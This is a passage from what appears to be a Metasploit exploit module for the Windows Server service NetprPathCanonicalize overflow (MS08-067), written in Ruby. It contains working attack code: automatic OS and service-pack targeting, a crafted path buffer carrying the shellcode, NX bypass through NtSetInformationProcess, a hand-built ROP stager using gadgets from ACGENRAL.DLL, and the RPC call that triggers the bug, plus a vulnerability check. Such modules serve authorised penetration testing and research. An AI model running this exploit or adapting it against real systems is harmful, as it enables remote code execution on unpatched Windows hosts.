| # 795 | # The Scratch element of 0x00020408 should work on all versions of Windows 796 | # 797 | # The actual function we use to disable NX looks like this: 798 | # 799 | # push 4 800 | # lea eax, [ebp+arg_0] 801 | # push eax 802 | # push 22h 803 | # push 0FFFFFFFFh 804 | # mov [ebp+arg_0], 2 805 | # call ds:__imp__NtSetInformationProcess@16 806 | # 807 | # 808 | # *** WINDOWS XP NON-NX TARGETS *** 809 | # 810 | # 811 | # Instead of bypassing NX, just return directly to a "JMP ESI", which takes us to the short 812 | # jump, and finally the shellcode. 813 | # 814 | # 815 | # *** WINDOWS 2003 SP2 TARGETS *** 816 | # 817 | # 818 | # There are only two possible ways to return to NtSetInformationProcess on Windows 2003 SP2, 819 | # both of these are inside NTDLL.DLL and use a return method that is not directly compatible 820 | # with our call stack. To solve this, Brett Moore figured out a multi-step return call chain 821 | # that eventually leads to the NX bypass function. 822 | # 823 | # 824 | # *** WINDOWS 2000 TARGETS *** 825 | # 826 | # 827 | # No NX to bypass, just return directly to a "JMP EDX", which takes us to the short 828 | # jump, and finally the shellcode. 829 | # 830 | # 831 | # *** WINDOWS VISTA TARGETS *** 832 | # 833 | # Currently untested, will involve ASLR and NX, should be fun. 834 | # 835 | # 836 | # *** NetprPathCanonicalize IDL *** 837 | # 838 | # 839 | # NET_API_STATUS NetprPathCanonicalize( 840 | # [in, string, unique] SRVSVC_HANDLE ServerName, 841 | # [in, string] WCHAR* PathName, 842 | # [out, size_is(OutbufLen)] unsigned char* Outbuf, 843 | # [in, range(0,64000)] DWORD OutbufLen, 844 | # [in, string] WCHAR* Prefix, 845 | # [in, out] DWORD* PathType, 846 | # [in] DWORD Flags 847 | # ); 848 | # 849 | 850 | def exploit 851 | begin 852 | connect 853 | smb_login 854 | rescue Rex::Proto::SMB::Exceptions::LoginError => e 855 | if e.message =~ /Connection reset/ 856 | print_error('Connection reset during login') 857 | print_error('This most likely means a previous exploit attempt caused the service to crash') 858 | return 859 | else 860 | raise e 861 | end 862 | end 863 | 864 | # Use a copy of the target 865 | mytarget = target 866 | 867 | if target['auto'] 868 | 869 | mytarget = nil 870 | 871 | print_status('Automatically detecting the target...') 872 | fprint = smb_fingerprint 873 | 874 | print_status("Fingerprint: #{fprint['os']} - #{fprint['sp']} - lang:#{fprint['lang']}") 875 | 876 | # Bail early on unknown OS 877 | if (fprint['os'] == 'Unknown') 878 | fail_with(Failure::NoTarget, 'No matching target') 879 | end 880 | 881 | # Windows 2000 is mostly universal 882 | if (fprint['os'] == 'Windows 2000') 883 | mytarget = targets[1] 884 | end 885 | 886 | # Windows XP SP0/SP1 is mostly universal 887 | if fprint['os'] == 'Windows XP' and fprint['sp'] == 'Service Pack 0 / 1' 888 | mytarget = targets[2] 889 | end 890 | 891 | # Windows 2003 SP0 is mostly universal 892 | if fprint['os'] == 'Windows 2003' and fprint['sp'].empty? 893 | mytarget = targets[3] 894 | end 895 | 896 | # Windows 2003 R2 is treated the same as 2003 897 | if (fprint['os'] == 'Windows 2003 R2') 898 | fprint['os'] = 'Windows 2003' 899 | end 900 | 901 | # Service Pack match must be exact 902 | if (not mytarget) and fprint['sp'].index('+') 903 | print_error('Could not determine the exact service pack') 904 | print_status("Auto-targeting failed, use 'show targets' to manually select one") 905 | disconnect 906 | return 907 | end 908 | 909 | # Language Pack match must be exact or we default to English 910 | if (not mytarget) and fprint['lang'] == 'Unknown' 911 | print_status('We could not detect the language pack, defaulting to English') 912 | fprint['lang'] = 'English' 913 | end 914 | 915 | # Normalize the service pack string 916 | fprint['sp'].gsub!(/Service Pack\s+/, 'SP') 917 | 918 | unless mytarget 919 | targets.each do |t| 920 | # Prefer AlwaysOn NX over NX, and NX over non-NX 921 | if t.name =~ /#{fprint['os']} #{fprint['sp']} #{fprint['lang']} \(AlwaysOn NX\)/ 922 | mytarget = t 923 | break 924 | end 925 | if t.name =~ /#{fprint['os']} #{fprint['sp']} #{fprint['lang']} \(NX\)/ 926 | mytarget = t 927 | break 928 | end 929 | end 930 | end 931 | 932 | unless mytarget 933 | fail_with(Failure::NoTarget, 'No matching target') 934 | end 935 | 936 | print_status("Selected Target: #{mytarget.name}") 937 | end 938 | 939 | # 940 | # Build the malicious path name 941 | # 942 | 943 | padder = [*('A'..'Z')] 944 | pad = 'A' 945 | while pad.length < 7 946 | c = padder[rand(padder.length)] 947 | next if pad.index(c) 948 | pad += c 949 | end 950 | 951 | prefix = '\\' 952 | path = '' 953 | server = Rex::Text.rand_text_alpha(rand(8) + 1).upcase 954 | 955 | # 956 | # Windows 2003 SP2 (NX) targets 957 | # 958 | if mytarget['RetDec'] 959 | 960 | jumper = Rex::Text.rand_text_alpha(70).upcase 961 | jumper[ 0, 4] = [mytarget['RetDec']].pack('V') # one more to Align and make room 962 | 963 | jumper[ 4, 4] = [mytarget['RetDec']].pack('V') # 4 more for space 964 | jumper[ 8, 4] = [mytarget['RetDec']].pack('V') 965 | jumper[ 12, 4] = [mytarget['RetDec']].pack('V') 966 | jumper[ 16, 4] = [mytarget['RetDec']].pack('V') 967 | 968 | jumper[ 20, 4] = [mytarget['RetPop']].pack('V') # pop to EBP 969 | jumper[ 24, 4] = [mytarget['DisableNX']].pack('V') 970 | 971 | jumper[ 56, 4] = [mytarget['JmpESP']].pack('V') 972 | jumper[ 60, 4] = [mytarget['JmpESP']].pack('V') 973 | jumper[ 64, 2] = "\xeb\x02" # our jump 974 | jumper[ 68, 2] = "\xeb\x62" # original 975 | 976 | path = 977 | Rex::Text.to_unicode('\\') + 978 | 979 | # This buffer is removed from the front 980 | Rex::Text.rand_text_alpha(100) + 981 | 982 | # Shellcode 983 | payload.encoded + 984 | 985 | # Relative path to trigger the bug 986 | Rex::Text.to_unicode('\\..\\..\\') + 987 | 988 | # Extra padding 989 | Rex::Text.to_unicode(pad) + 990 | 991 | # Writable memory location (static) 992 | [mytarget['Scratch']].pack('V') + # EBP 993 | 994 | # Return to code which disables NX (or just the return) 995 | [mytarget['RetDec']].pack('V') + 996 | 997 | # Padding with embedded jump 998 | jumper + 999 | 1000 | # NULL termination 1001 | "\x00" * 2 1002 | 1003 | # 1004 | # Windows XP SP2/SP3 ROP Stager targets 1005 | # 1006 | elsif mytarget['UseROP'] 1007 | 1008 | rop = generate_rop(mytarget['UseROP']) 1009 | 1010 | path = 1011 | Rex::Text.to_unicode('\\') + 1012 | 1013 | # This buffer is removed from the front 1014 | Rex::Text.rand_text_alpha(100) + 1015 | 1016 | # Shellcode 1017 | payload.encoded + 1018 | 1019 | # Relative path to trigger the bug 1020 | Rex::Text.to_unicode('\\..\\..\\') + 1021 | 1022 | # Extra padding 1023 | Rex::Text.to_unicode(pad) + 1024 | 1025 | # ROP Stager 1026 | rop + 1027 | 1028 | # Padding (skipped) 1029 | Rex::Text.rand_text_alpha(2) + 1030 | 1031 | # NULL termination 1032 | "\x00" * 2 1033 | 1034 | # 1035 | # Windows 2000, XP (NX), and 2003 (NO NX) targets 1036 | # 1037 | else 1038 | 1039 | jumper = Rex::Text.rand_text_alpha(70).upcase 1040 | jumper[ 4, 4] = [mytarget.ret].pack('V') 1041 | jumper[50, 8] = make_nops(8) 1042 | jumper[58, 2] = "\xeb\x62" 1043 | 1044 | path = 1045 | Rex::Text.to_unicode('\\') + 1046 | 1047 | # This buffer is removed from the front 1048 | Rex::Text.rand_text_alpha(100) + 1049 | 1050 | # Shellcode 1051 | payload.encoded + 1052 | 1053 | # Relative path to trigger the bug 1054 | Rex::Text.to_unicode('\\..\\..\\') + 1055 | 1056 | # Extra padding 1057 | Rex::Text.to_unicode(pad) + 1058 | 1059 | # Writable memory location (static) 1060 | [mytarget['Scratch']].pack('V') + # EBP 1061 | 1062 | # Return to code which disables NX (or just the return) 1063 | [mytarget['DisableNX'] || mytarget.ret].pack('V') + 1064 | 1065 | # Padding with embedded jump 1066 | jumper + 1067 | 1068 | # NULL termination 1069 | "\x00" * 2 1070 | 1071 | end 1072 | 1073 | handle = dcerpc_handle( 1074 | '4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0', 1075 | 'ncacn_np', ["\\#{datastore['SMBPIPE']}"] 1076 | ) 1077 | 1078 | dcerpc_bind(handle) 1079 | 1080 | stub = 1081 | NDR.uwstring(server) + 1082 | NDR.UnicodeConformantVaryingStringPreBuilt(path) + 1083 | NDR.long(rand(1024)) + 1084 | NDR.wstring(prefix) + 1085 | NDR.long(4097) + 1086 | NDR.long(0) 1087 | 1088 | # NOTE: we don't bother waiting for a response here... 1089 | print_status('Attempting to trigger the vulnerability...') 1090 | dcerpc.call(0x1f, stub, false) 1091 | 1092 | # Cleanup 1093 | handler 1094 | disconnect 1095 | end 1096 | 1097 | def check 1098 | begin 1099 | connect 1100 | smb_login 1101 | rescue Rex::ConnectionError => e 1102 | vprint_error("Connection failed: #{e.class}: #{e}") 1103 | return Msf::Exploit::CheckCode::Unknown 1104 | rescue Rex::Proto::SMB::Exceptions::LoginError => e 1105 | if e.message =~ /Connection reset/ 1106 | vprint_error('Connection reset during login') 1107 | vprint_error('This most likely means a previous exploit attempt caused the service to crash') 1108 | return Msf::Exploit::CheckCode::Unknown 1109 | else 1110 | raise e 1111 | end 1112 | end 1113 | 1114 | # 1115 | # Build the malicious path name 1116 | # 5b878ae7 "db @eax;g" 1117 | prefix = '\\' 1118 | path = 1119 | "\x00\\\x00/" * 0x10 + 1120 | Rex::Text.to_unicode('\\') + 1121 | Rex::Text.to_unicode('R7') + 1122 | Rex::Text.to_unicode('\\..\\..\\') + 1123 | Rex::Text.to_unicode('R7') + 1124 | "\x00" * 2 1125 | 1126 | server = Rex::Text.rand_text_alpha(rand(8) + 1).upcase 1127 | 1128 | handle = dcerpc_handle('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0', 1129 | 'ncacn_np', ["\\#{datastore['SMBPIPE']}"] 1130 | ) 1131 | 1132 | begin 1133 | # Samba doesn't have this handle and returns an ErrorCode 1134 | dcerpc_bind(handle) 1135 | rescue Rex::Proto::SMB::Exceptions::ErrorCode => e 1136 | vprint_error("SMB error: #{e.message}") 1137 | return Msf::Exploit::CheckCode::Safe 1138 | end 1139 | 1140 | vprint_status('Verifying vulnerable status... (path: 0x%08x)' % path.length) 1141 | 1142 | stub = 1143 | NDR.uwstring(server) + 1144 | NDR.UnicodeConformantVaryingStringPreBuilt(path) + 1145 | NDR.long(8) + 1146 | NDR.wstring(prefix) + 1147 | NDR.long(4097) + 1148 | NDR.long(0) 1149 | 1150 | resp = dcerpc.call(0x1f, stub) 1151 | error = resp[4, 4].unpack('V')[0] 1152 | 1153 | # Cleanup 1154 | simple.client.close 1155 | simple.client.tree_disconnect 1156 | disconnect 1157 | 1158 | if (error == 0x0052005c) # \R :) 1159 | return Msf::Exploit::CheckCode::Vulnerable 1160 | else 1161 | vprint_error('System is not vulnerable (status: 0x%08x)' % error) if error 1162 | return Msf::Exploit::CheckCode::Safe 1163 | end 1164 | end 1165 | 1166 | def generate_rop(version) 1167 | free_byte = "\x90" 1168 | # free_byte = "\xcc" 1169 | 1170 | # create a few small gadgets 1171 | # ; pop edx; pop ecx; ret 1172 | gadget1 = free_byte + "\x5a\x59\xc3" 1173 | # mov edi, eax; add edi,0xc; push 0x40; pop ecx; rep movsd 1174 | gadget2 = free_byte + "\x89\xc7" + "\x83\xc7\x0c" + "\x6a\x7f" + "\x59" + "\xf2\xa5" + free_byte 1175 | # ; ; jmp $+0x5c 1176 | gadget3 = "\xcc" + free_byte + "\xeb\x5a" 1177 | 1178 | # gadget2: 1179 | # get eax into edi 1180 | # adjust edi 1181 | # get 0x7f in ecx 1182 | # copy the data 1183 | # jmp to it 1184 | # 1185 | dws = gadget2.unpack('V*') 1186 | 1187 | ## 1188 | # Create the ROP stager, pfew.. Props to corelanc0d3r! 1189 | # This was no easy task due to space limitations :-/ 1190 | # -jduck 1191 | ## 1192 | module_name = 'ACGENRAL.DLL' 1193 | module_base = 0x6f880000 1194 | 1195 | rvasets = {} 1196 | # XP SP2 1197 | rvasets['5.1.2600.2180'] = { 1198 | # call [imp_HeapCreate] / mov [0x6f8b8024], eax / ret 1199 | 'call_HeapCreate' => 0x21064, 1200 | 'add eax, ebp / mov ecx, 0x59ffffa8 / ret' => 0x2e546, 1201 | 'pop ecx / ret' => 0x2e546 + 6, 1202 | 'mov [eax], ecx / ret' => 0xd182, 1203 | 'jmp eax' => 0x19b85, 1204 | 'mov [eax+8], edx / mov [eax+0xc], ecx / mov [eax+0x10], ecx / ret' => 0x10976, 1205 | 'mov [eax+0x10], ecx / ret' => 0x10976 + 6, 1206 | 'add eax, 8 / ret' => 0x29a14 1207 | } 1208 | 1209 | # XP SP3 1210 | rvasets['5.1.2600.5512'] = { 1211 | # call [imp_HeapCreate] / mov [0x6f8b02c], eax / ret 1212 | 'call_HeapCreate' => 0x21286, 1213 | 'add eax, ebp / mov ecx, 0x59ffffa8 / ret' => 0x2e796, 1214 | 'pop ecx / ret' => 0x2e796 + 6, 1215 | 'mov [eax], ecx / ret' => 0xd296, 1216 | 'jmp eax' => 0x19c6f, 1217 | 'mov [eax+8], edx / mov [eax+0xc], ecx / mov [eax+0x10], ecx / ret' => 0x10a56, 1218 | 'mov [eax+0x10], ecx / ret' => 0x10a56 + 6, 1219 | 'add eax, 8 / ret' => 0x29c64 1220 | } 1221 | 1222 | # HeapCreate ROP Stager from ACGENRAL.DLL 5.1.2600.2180 1223 | rop = [ 1224 | # prime ebp (adjustment distance) 1225 | 0x00018000, 1226 | 1227 | # get some RWX memory via HeapCreate 1228 | 'call_HeapCreate', 1229 | 0x01040110, # flOptions (gets & with 0x40005) 1230 | 0x01010101, 1231 | 0x01010101, 1232 | 1233 | # adjust the returned pointer 1234 | 'add eax, ebp / mov ecx, 0x59ffffa8 / ret', 1235 | 1236 | # setup gadget1 1237 | 'pop ecx / ret', 1238 | gadget1.unpack('V').first, 1239 | 'mov [eax], ecx / ret', 1240 | 1241 | # execute gadget1 1242 | 'jmp eax', 1243 | 1244 | # setup gadget2 (via gadget1) 1245 | dws[0], 1246 | dws[1], 1247 | 'mov [eax+8], edx / mov [eax+0xc], ecx / mov [eax+0x10], ecx / ret', 1248 | 1249 | # setup part3 of gadget2 1250 | 'pop ecx / ret', 1251 | dws[2], 1252 | 'mov [eax+0x10], ecx / ret', 1253 | 1254 | # execute gadget2 1255 | 'add eax, 8 / ret', 1256 | 'jmp eax', 1257 | 1258 | # gadget3 gets executed after gadget2 (luckily) 1259 | gadget3.unpack('V').first 1260 | ] 1261 | 1262 | # convert the meta rop into concrete bytes 1263 | rvas = rvasets[version] 1264 | 1265 | rop.map! { |e| 1266 | if e.kind_of? String 1267 | # Meta-replace (RVA) 1268 | fail_with(Failure::BadConfig, "Unable to locate key: \"#{e}\"") unless rvas[e] 1269 | module_base + rvas[e] 1270 | 1271 | elsif e == :unused 1272 | # Randomize 1273 | rand_text(4).unpack('V').first 1274 | 1275 | else 1276 | # Literal 1277 | e 1278 | end 1279 | } 1280 | 1281 | ret = rop.pack('V*') 1282 | 1283 | # check badchars? 1284 | # idx = Rex::Text.badchar_index(ret, payload_badchars) 1285 | 1286 | ret 1287 | end 1288 | end 1289 | --------------------------------------------------------------------------------